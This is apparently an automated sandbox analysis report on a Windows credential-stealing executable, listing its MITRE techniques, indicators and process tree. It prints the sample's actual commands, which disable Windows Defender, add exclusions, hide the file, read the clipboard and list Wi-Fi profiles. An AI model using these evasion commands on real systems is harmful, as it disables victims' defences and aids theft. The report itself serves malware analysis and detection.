2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440

Analysis

max time kernel
103s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
14/04/2025, 02:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe
Size

7.4MB
MD5

b1479e420c440666dfef71f621231dc5
SHA1

c641eda7573b2bef8e75961bac4953e170987dd8
SHA256

2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440
SHA512

4dc693ebe2f7c5e14cd00f908b75bcc984dd9ffbee95653acf65b44181efeb00d3624343312f7c9d352baed71e40fe028f5b2075bb8e120c2a559473a48d9be8
SSDEEP

196608:TWc8PZ1vOguLjv+bhqNVoB0SEsucQZ41JBbI8s1LchA:n8PZ1vOlL+9qz80SJHQK1JVshchA

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5004	powershell.exe
3628	powershell.exe
1152	powershell.exe
2064	powershell.exe
212	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3652	cmd.exe
1732	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2684	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe
1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe
1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe
1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe
1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe
1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe
1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe
1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe
1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe
1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe
1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe
1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe
1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe
1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe
1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe
1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe
1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
4872	tasklist.exe
1556	tasklist.exe
3928	tasklist.exe
3348	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2676	cmd.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000241d9-21.dat	upx
behavioral1/memory/1076-25-0x00007FFF4D640000-0x00007FFF4DC2E000-memory.dmp	upx
behavioral1/files/0x00080000000241cc-27.dat	upx
behavioral1/memory/1076-32-0x00007FFF54D20000-0x00007FFF54D2F000-memory.dmp	upx
behavioral1/memory/1076-31-0x00007FFF54600000-0x00007FFF54624000-memory.dmp	upx
behavioral1/files/0x00070000000241d7-30.dat	upx
behavioral1/files/0x00070000000241d3-48.dat	upx
behavioral1/files/0x00070000000241d2-47.dat	upx
behavioral1/files/0x00070000000241d1-46.dat	upx
behavioral1/files/0x00070000000241d0-45.dat	upx
behavioral1/files/0x00070000000241cf-44.dat	upx
behavioral1/files/0x00070000000241ce-43.dat	upx
behavioral1/files/0x00070000000241cd-42.dat	upx
behavioral1/files/0x00090000000241cb-41.dat	upx
behavioral1/files/0x00070000000241de-40.dat	upx
behavioral1/files/0x00070000000241dd-39.dat	upx
behavioral1/files/0x00070000000241dc-38.dat	upx
behavioral1/files/0x00070000000241d8-35.dat	upx
behavioral1/files/0x00070000000241d6-34.dat	upx
behavioral1/memory/1076-52-0x00007FFF51250000-0x00007FFF5127D000-memory.dmp	upx
behavioral1/memory/1076-50-0x00007FFF512E0000-0x00007FFF512F9000-memory.dmp	upx
behavioral1/memory/1076-58-0x00007FFF50EE0000-0x00007FFF50F03000-memory.dmp	upx
behavioral1/memory/1076-60-0x00007FFF418D0000-0x00007FFF41A46000-memory.dmp	upx
behavioral1/memory/1076-62-0x00007FFF51080000-0x00007FFF51099000-memory.dmp	upx
behavioral1/memory/1076-64-0x00007FFF511F0000-0x00007FFF511FD000-memory.dmp	upx
behavioral1/memory/1076-66-0x00007FFF50EA0000-0x00007FFF50ED3000-memory.dmp	upx
behavioral1/memory/1076-71-0x00007FFF41800000-0x00007FFF418CD000-memory.dmp	upx
behavioral1/memory/1076-70-0x00007FFF4D640000-0x00007FFF4DC2E000-memory.dmp	upx
behavioral1/memory/1076-73-0x00007FFF412D0000-0x00007FFF417F2000-memory.dmp	upx
behavioral1/memory/1076-75-0x00007FFF54D20000-0x00007FFF54D2F000-memory.dmp	upx
behavioral1/memory/1076-79-0x00007FFF50E70000-0x00007FFF50E7D000-memory.dmp	upx
behavioral1/memory/1076-78-0x00007FFF50E80000-0x00007FFF50E94000-memory.dmp	upx
behavioral1/memory/1076-74-0x00007FFF54600000-0x00007FFF54624000-memory.dmp	upx
behavioral1/memory/1076-81-0x00007FFF411B0000-0x00007FFF412CC000-memory.dmp	upx
behavioral1/memory/1076-106-0x00007FFF50EE0000-0x00007FFF50F03000-memory.dmp	upx
behavioral1/memory/1076-119-0x00007FFF418D0000-0x00007FFF41A46000-memory.dmp	upx
behavioral1/memory/1076-191-0x00007FFF51080000-0x00007FFF51099000-memory.dmp	upx
behavioral1/memory/1076-270-0x00007FFF50EA0000-0x00007FFF50ED3000-memory.dmp	upx
behavioral1/memory/1076-282-0x00007FFF41800000-0x00007FFF418CD000-memory.dmp	upx
behavioral1/memory/1076-290-0x00007FFF412D0000-0x00007FFF417F2000-memory.dmp	upx
behavioral1/memory/1076-300-0x00007FFF4D640000-0x00007FFF4DC2E000-memory.dmp	upx
behavioral1/memory/1076-306-0x00007FFF418D0000-0x00007FFF41A46000-memory.dmp	upx
behavioral1/memory/1076-301-0x00007FFF54600000-0x00007FFF54624000-memory.dmp	upx
behavioral1/memory/1076-314-0x00007FFF411B0000-0x00007FFF412CC000-memory.dmp	upx
behavioral1/memory/1076-350-0x00007FFF50EA0000-0x00007FFF50ED3000-memory.dmp	upx
behavioral1/memory/1076-351-0x00007FFF41800000-0x00007FFF418CD000-memory.dmp	upx
behavioral1/memory/1076-349-0x00007FFF511F0000-0x00007FFF511FD000-memory.dmp	upx
behavioral1/memory/1076-348-0x00007FFF51080000-0x00007FFF51099000-memory.dmp	upx
behavioral1/memory/1076-347-0x00007FFF418D0000-0x00007FFF41A46000-memory.dmp	upx
behavioral1/memory/1076-346-0x00007FFF50EE0000-0x00007FFF50F03000-memory.dmp	upx
behavioral1/memory/1076-345-0x00007FFF51250000-0x00007FFF5127D000-memory.dmp	upx
behavioral1/memory/1076-344-0x00007FFF512E0000-0x00007FFF512F9000-memory.dmp	upx
behavioral1/memory/1076-343-0x00007FFF54D20000-0x00007FFF54D2F000-memory.dmp	upx
behavioral1/memory/1076-342-0x00007FFF54600000-0x00007FFF54624000-memory.dmp	upx
behavioral1/memory/1076-341-0x00007FFF412D0000-0x00007FFF417F2000-memory.dmp	upx
behavioral1/memory/1076-340-0x00007FFF411B0000-0x00007FFF412CC000-memory.dmp	upx
behavioral1/memory/1076-339-0x00007FFF50E70000-0x00007FFF50E7D000-memory.dmp	upx
behavioral1/memory/1076-338-0x00007FFF50E80000-0x00007FFF50E94000-memory.dmp	upx
behavioral1/memory/1076-326-0x00007FFF4D640000-0x00007FFF4DC2E000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2336	cmd.exe
4592	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
744	cmd.exe
2372	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2972	WMIC.exe
4504	WMIC.exe
544	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
536	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4592	PING.EXE

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
3628	powershell.exe
1152	powershell.exe
1152	powershell.exe
3628	powershell.exe
3628	powershell.exe
1152	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
1732	powershell.exe
1732	powershell.exe
4328	powershell.exe
4328	powershell.exe
1732	powershell.exe
4328	powershell.exe
2064	powershell.exe
2064	powershell.exe
2064	powershell.exe
1140	powershell.exe
1140	powershell.exe
1140	powershell.exe
212	powershell.exe
212	powershell.exe
5076	powershell.exe
5076	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3928	tasklist.exe
Token: SeDebugPrivilege	3628	powershell.exe
Token: SeIncreaseQuotaPrivilege	1204	WMIC.exe
Token: SeSecurityPrivilege	1204	WMIC.exe
Token: SeTakeOwnershipPrivilege	1204	WMIC.exe
Token: SeLoadDriverPrivilege	1204	WMIC.exe
Token: SeSystemProfilePrivilege	1204	WMIC.exe
Token: SeSystemtimePrivilege	1204	WMIC.exe
Token: SeProfSingleProcessPrivilege	1204	WMIC.exe
Token: SeIncBasePriorityPrivilege	1204	WMIC.exe
Token: SeCreatePagefilePrivilege	1204	WMIC.exe
Token: SeBackupPrivilege	1204	WMIC.exe
Token: SeRestorePrivilege	1204	WMIC.exe
Token: SeShutdownPrivilege	1204	WMIC.exe
Token: SeDebugPrivilege	1204	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1204	WMIC.exe
Token: SeRemoteShutdownPrivilege	1204	WMIC.exe
Token: SeUndockPrivilege	1204	WMIC.exe
Token: SeManageVolumePrivilege	1204	WMIC.exe
Token: 33	1204	WMIC.exe
Token: 34	1204	WMIC.exe
Token: 35	1204	WMIC.exe
Token: 36	1204	WMIC.exe
Token: SeDebugPrivilege	1152	powershell.exe
Token: SeIncreaseQuotaPrivilege	1204	WMIC.exe
Token: SeSecurityPrivilege	1204	WMIC.exe
Token: SeTakeOwnershipPrivilege	1204	WMIC.exe
Token: SeLoadDriverPrivilege	1204	WMIC.exe
Token: SeSystemProfilePrivilege	1204	WMIC.exe
Token: SeSystemtimePrivilege	1204	WMIC.exe
Token: SeProfSingleProcessPrivilege	1204	WMIC.exe
Token: SeIncBasePriorityPrivilege	1204	WMIC.exe
Token: SeCreatePagefilePrivilege	1204	WMIC.exe
Token: SeBackupPrivilege	1204	WMIC.exe
Token: SeRestorePrivilege	1204	WMIC.exe
Token: SeShutdownPrivilege	1204	WMIC.exe
Token: SeDebugPrivilege	1204	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1204	WMIC.exe
Token: SeRemoteShutdownPrivilege	1204	WMIC.exe
Token: SeUndockPrivilege	1204	WMIC.exe
Token: SeManageVolumePrivilege	1204	WMIC.exe
Token: 33	1204	WMIC.exe
Token: 34	1204	WMIC.exe
Token: 35	1204	WMIC.exe
Token: 36	1204	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2972	WMIC.exe
Token: SeSecurityPrivilege	2972	WMIC.exe
Token: SeTakeOwnershipPrivilege	2972	WMIC.exe
Token: SeLoadDriverPrivilege	2972	WMIC.exe
Token: SeSystemProfilePrivilege	2972	WMIC.exe
Token: SeSystemtimePrivilege	2972	WMIC.exe
Token: SeProfSingleProcessPrivilege	2972	WMIC.exe
Token: SeIncBasePriorityPrivilege	2972	WMIC.exe
Token: SeCreatePagefilePrivilege	2972	WMIC.exe
Token: SeBackupPrivilege	2972	WMIC.exe
Token: SeRestorePrivilege	2972	WMIC.exe
Token: SeShutdownPrivilege	2972	WMIC.exe
Token: SeDebugPrivilege	2972	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2972	WMIC.exe
Token: SeRemoteShutdownPrivilege	2972	WMIC.exe
Token: SeUndockPrivilege	2972	WMIC.exe
Token: SeManageVolumePrivilege	2972	WMIC.exe
Token: 33	2972	WMIC.exe
Token: 34	2972	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2472 wrote to memory of 1076	2472	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	85
PID 2472 wrote to memory of 1076	2472	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	85
PID 1076 wrote to memory of 4048	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	89
PID 1076 wrote to memory of 4048	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	89
PID 1076 wrote to memory of 1628	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	90
PID 1076 wrote to memory of 1628	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	90
PID 1076 wrote to memory of 4920	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	92
PID 1076 wrote to memory of 4920	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	92
PID 4048 wrote to memory of 3628	4048	cmd.exe	95
PID 4048 wrote to memory of 3628	4048	cmd.exe	95
PID 1076 wrote to memory of 3944	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	96
PID 1076 wrote to memory of 3944	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	96
PID 4920 wrote to memory of 3928	4920	cmd.exe	98
PID 4920 wrote to memory of 3928	4920	cmd.exe	98
PID 1628 wrote to memory of 1152	1628	cmd.exe	99
PID 1628 wrote to memory of 1152	1628	cmd.exe	99
PID 3944 wrote to memory of 1204	3944	cmd.exe	100
PID 3944 wrote to memory of 1204	3944	cmd.exe	100
PID 1076 wrote to memory of 4792	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	104
PID 1076 wrote to memory of 4792	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	104
PID 4792 wrote to memory of 4924	4792	cmd.exe	106
PID 4792 wrote to memory of 4924	4792	cmd.exe	106
PID 1076 wrote to memory of 3384	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	107
PID 1076 wrote to memory of 3384	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	107
PID 3384 wrote to memory of 4472	3384	cmd.exe	109
PID 3384 wrote to memory of 4472	3384	cmd.exe	109
PID 1076 wrote to memory of 3256	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	110
PID 1076 wrote to memory of 3256	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	110
PID 3256 wrote to memory of 2972	3256	cmd.exe	112
PID 3256 wrote to memory of 2972	3256	cmd.exe	112
PID 1076 wrote to memory of 960	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	113
PID 1076 wrote to memory of 960	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	113
PID 960 wrote to memory of 4504	960	cmd.exe	115
PID 960 wrote to memory of 4504	960	cmd.exe	115
PID 1076 wrote to memory of 2676	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	116
PID 1076 wrote to memory of 2676	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	116
PID 1076 wrote to memory of 3604	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	117
PID 1076 wrote to memory of 3604	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	117
PID 2676 wrote to memory of 4436	2676	cmd.exe	120
PID 2676 wrote to memory of 4436	2676	cmd.exe	120
PID 3604 wrote to memory of 5004	3604	cmd.exe	121
PID 3604 wrote to memory of 5004	3604	cmd.exe	121
PID 1076 wrote to memory of 1524	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	122
PID 1076 wrote to memory of 1524	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	122
PID 1076 wrote to memory of 916	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	123
PID 1076 wrote to memory of 916	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	123
PID 1524 wrote to memory of 3348	1524	cmd.exe	126
PID 1524 wrote to memory of 3348	1524	cmd.exe	126
PID 916 wrote to memory of 4872	916	cmd.exe	127
PID 916 wrote to memory of 4872	916	cmd.exe	127
PID 1076 wrote to memory of 1144	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	128
PID 1076 wrote to memory of 1144	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	128
PID 1076 wrote to memory of 3652	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	129
PID 1076 wrote to memory of 3652	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	129
PID 1076 wrote to memory of 2332	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	131
PID 1076 wrote to memory of 2332	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	131
PID 1076 wrote to memory of 1648	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	134
PID 1076 wrote to memory of 1648	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	134
PID 1076 wrote to memory of 744	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	136
PID 1076 wrote to memory of 744	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	136
PID 1076 wrote to memory of 4376	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	137
PID 1076 wrote to memory of 4376	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	137
PID 1076 wrote to memory of 3616	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	140
PID 1076 wrote to memory of 3616	1076	2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe	140

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4436	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe
"C:\Users\Admin\AppData\Local\Temp\2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2472
- C:\Users\Admin\AppData\Local\Temp\2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe
  "C:\Users\Admin\AppData\Local\Temp\2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4048
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1628
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4920
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3944
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4792
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3384
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3256
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:2972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:960
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:2676
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\2a757f711c41e58fb587568a92009aa3349e2f9e3548ae8aaab606cd02b9e440.exe"
      4⤵
      Views/modifies file attributes
      PID:4436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‍ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3604
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1524
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:916
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:1144
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:1732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2332
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1648
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:744
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2372
